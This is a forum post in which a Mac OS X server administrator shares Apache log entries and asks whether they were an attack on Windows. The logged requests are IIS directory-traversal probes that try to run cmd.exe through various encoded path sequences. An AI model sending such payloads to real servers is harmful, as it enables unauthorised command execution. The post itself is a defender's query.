Okrill
Mitglied
Thread Starter
- Dabei seit
- 18.01.2002
- Beiträge
- 67
- Reaktionspunkte
- 0
Beim stöbern in den Apache log's bin ich über solche einträge gestolpert (ist eine eigenes Logfile):
So wie ich das interpretiere muss ich mir um unseren OS X Server keine sorgen machen (zumindest noch nicht ) aber ich bin neugierig, war das ein versuch ein Win32 anzugreifen? oder was wurde da versucht?
und im Access log ist zur passenden zeit das drin:217.235.100.236 - - [06/Dec/2004:13:39:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
217.235.100.236 - - [06/Dec/2004:13:39:39 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
217.235.100.236 - - [06/Dec/2004:13:39:42 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:39:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:57 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
217.235.100.236 - - [06/Dec/2004:13:40:00 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:06 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:12 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:15 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:18 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:40:21 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - [06/Dec/2004:13:39:36 +0100] -
So wie ich das interpretiere muss ich mir um unseren OS X Server keine sorgen machen (zumindest noch nicht ) aber ich bin neugierig, war das ein versuch ein Win32 anzugreifen? oder was wurde da versucht?